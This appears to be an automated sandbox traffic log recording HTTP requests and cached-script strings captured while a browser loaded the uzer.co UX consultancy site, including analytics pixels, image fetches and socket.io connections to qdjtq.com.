Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=524515998044999&ev=PageView&dl=https%3A%2F%2Fuzer.co%2F&rl=&if=false&ts=1727397052891&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397052883.717417846250247157&ler=empty&cdl=API_unavailable&it=1727397049848&coo=false&exp=f1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/10981864615/?random=2118022389&cv=11&fst=1727397050638&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgi5wbECCLHDsQIIisWxAgjDybECIgEBOAFAAUoVdHJpZ2dlciwgZXZlbnQtc291cmNlYgQKAgID&pscrd=CNuT36rD1Zm3YSITCLusyb7v4YgDFQr0EQgdIIwrXjICCAMyAggEMgIIBzICCAgyAggJMgIICjICCAIyAggLMgIIFTICCB8yAggTMgIIEjoQaHR0cHM6Ly91emVyLmNvL0JYQ2hFSThJelV0d1lRck1IajdlbkN2cl9DQVJJdEFLbC1WOFlkX3pNZHVHMXBnZGFPU1ptU3prbmZZUlBXVmxpLU5tNk1SRWJjYTFDdWhBbnhubDY0V0lvdA&is_vtc=1&cid=CAQSKQDpaXnfxuEDsJJCkiNwztczFfR-wcabCo-TlPEvaX4PFadRwcJZgvxp&random=351978482 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=22144436&utk= HTTP/1.1Host: forms.hscollectedforms.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port3-m.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/header_ins.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=.KW3cwWT8XsaY_lMcU._7zntSalqNPMg_J5QCnD687A-1727397056-1.0.1.1-qRolGA254qe1Td8nyf2U_KQI7EwCgwqFmF9F4C.DnyvRqZ05VUd59rxPj1iKZ3HnEFgiDxxa.E57sRnHkoYZLA; _cfuvid=cUAmgNoOS7D2wwfyRT4GSqZGeCeIZ4GEIzZ1p3eQEJA-1727397056391-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /images/header_lk.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muqjQ HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/header_fb.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=22144436&rcu=https%3A%2F%2Fuzer.co%2F&pu=https%3A%2F%2Fuzer.co%2F&t=UZER+-+Agencia+de+Consultor%C3%ADa+y+Dise%C3%B1o+UX+%2F+UI&cts=1727397055952&vi=32a670a5d2461665761881df2eca03d8&nc=true&u=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1&b=146685547.1.1727397055947&cc=15 HTTP/1.1Host: track.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/cropped-favicon-uzer-32x32.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157; __hstc=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1; hubspotutk=32a670a5d2461665761881df2eca03d8; __hssrc=1; __hssc=146685547.1.1727397055947
Source: global trafficHTTP traffic detected: GET /images/port6-m.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /images/port7-m.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/10981864615/?random=2118022389&cv=11&fst=1727397050638&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgi5wbECCLHDsQIIisWxAgjDybECIgEBOAFAAUoVdHJpZ2dlciwgZXZlbnQtc291cmNlYgQKAgID&pscrd=CNuT36rD1Zm3YSITCLusyb7v4YgDFQr0EQgdIIwrXjICCAMyAggEMgIIBzICCAgyAggJMgIICjICCAIyAggLMgIIFTICCB8yAggTMgIIEjoQaHR0cHM6Ly91emVyLmNvL0JYQ2hFSThJelV0d1lRck1IajdlbkN2cl9DQVJJdEFLbC1WOFlkX3pNZHVHMXBnZGFPU1ptU3prbmZZUlBXVmxpLU5tNk1SRWJjYTFDdWhBbnhubDY0V0lvdA&is_vtc=1&cid=CAQSKQDpaXnfxuEDsJJCkiNwztczFfR-wcabCo-TlPEvaX4PFadRwcJZgvxp&random=351978482 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /error.html HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157; __hstc=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1; hubspotutk=32a670a5d2461665761881df2eca03d8; __hssrc=1; __hssc=146685547.1.1727397055947
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=22144436&rcu=https%3A%2F%2Fuzer.co%2F&pu=https%3A%2F%2Fuzer.co%2F&t=UZER+-+Agencia+de+Consultor%C3%ADa+y+Dise%C3%B1o+UX+%2F+UI&cts=1727397055952&vi=32a670a5d2461665761881df2eca03d8&nc=true&u=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1&b=146685547.1.1727397055947&cc=15 HTTP/1.1Host: track.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=NzmPxuzL10STMpbWI9UrLjdv.biwytl1eGzKAZpTNKs-1727397057-1.0.1.1-mXKFqyrI1dxU1vHIyYMNYg6yVK0lVUL3jgFSPLNPHC73yxU5y6fUeBFq9AGsOQU7xanrviLynNYQBJmLiKyT1A; _cfuvid=V4GqU7UHpyCTktJbulvdeBPR0OXFaNWtSz9ruj_yxEY-1727397057688-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /images/clutch-logo-footer.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-cta.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /images/separador-dato1.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mur3q&sid=VLhOORCLSY2MXW0LAHuP HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=VLhOORCLSY2MXW0LAHuP HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: sG7sqxfvAyCS8U4Tp/ecDg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muqjQ HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/cropped-favicon-uzer-192x192.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157; __hstc=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1; hubspotutk=32a670a5d2461665761881df2eca03d8; __hssrc=1; __hssc=146685547.1.1727397055947
Source: global trafficHTTP traffic detected: GET /images/separador-dato2.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /images/imagen-home-2024.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157
Source: global trafficHTTP traffic detected: GET /error.html HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157; __hstc=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1; hubspotutk=32a670a5d2461665761881df2eca03d8; __hssrc=1; __hssc=146685547.1.1727397055947
Source: global trafficHTTP traffic detected: GET /images/cropped-favicon-uzer-192x192.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051; _fbp=fb.1.1727397052883.717417846250247157; __hstc=146685547.32a670a5d2461665761881df2eca03d8.1727397055947.1727397055947.1727397055947.1; hubspotutk=32a670a5d2461665761881df2eca03d8; __hssrc=1; __hssc=146685547.1.1727397055947
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8murQL&sid=VLhOORCLSY2MXW0LAHuP HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mur3m&sid=VLhOORCLSY2MXW0LAHuP HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mur3q&sid=VLhOORCLSY2MXW0LAHuP HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8murQL&sid=VLhOORCLSY2MXW0LAHuP HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mur_t HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_443.2.dr, chromecache_175.2.drString found in binary or memory: https://www.youtube.com/watch?v=:id equals www.youtube.com (Youtube)
Source: chromecache_443.2.dr, chromecache_175.2.drString found in binary or memory: html.attr( 'src', '//www.youtube.com/embed/' + video.id + '?autoplay=1&rel=0&v=' + video.id ); equals www.youtube.com (Youtube)
Source: chromecache_509.2.dr, chromecache_184.2.drString found in binary or memory: url = 'http://www.linkedin.com/shareArticle?url='+url; equals www.linkedin.com (Linkedin)
Source: chromecache_509.2.dr, chromecache_184.2.drString found in binary or memory: url = 'https://www.facebook.com/sharer/sharer.php?u='+url+'&t='+title; equals www.facebook.com (Facebook)
Source: chromecache_440.2.dr, chromecache_429.2.drString found in binary or memory: "https://www.facebook.com/UZER.co/", equals www.facebook.com (Facebook)
Source: chromecache_440.2.dr, chromecache_429.2.drString found in binary or memory: "https://www.linkedin.com/company/xtrategy.co/about/" equals www.linkedin.com (Linkedin)
Source: chromecache_429.2.drString found in binary or memory: <a href="https://www.facebook.com/UZER.co" target="_blank" class="footer_link"><img equals www.facebook.com (Facebook)
Source: chromecache_512.2.drString found in binary or memory: src="https://www.facebook.com/tr?id=303367017008635&ev=PageView equals www.facebook.com (Facebook)
Source: chromecache_440.2.dr, chromecache_429.2.drString found in binary or memory: src="https://www.facebook.com/tr?id=524515998044999&ev=PageView&noscript=1" /></noscript> equals www.facebook.com (Facebook)
Source: chromecache_510.2.dr, chromecache_428.2.dr, chromecache_325.2.dr, chromecache_520.2.drString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Yj:function(){e=zb()},nd:function(){d()}}};var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
Source: chromecache_510.2.dr, chromecache_428.2.dr, chromecache_325.2.dr, chromecache_520.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={eh:e,ah:f,bh:g,Ph:k,Qh:m,Ge:n,Bb:b},q=C.YT;if(q)return q.ready&&q.ready(d),b;var r=C.onYouTubeIframeAPIReady;C.onYouTubeIframeAPIReady=function(){r&&r();d()};F(function(){for(var t=E.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(QC(w,"iframe_api")||QC(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!HC&&OC(x[A],p.Ge))return wc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_488.2.dr, chromecache_205.2.drString found in binary or memory: return b}DC.H="internal.enableAutoEventOnTimer";var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
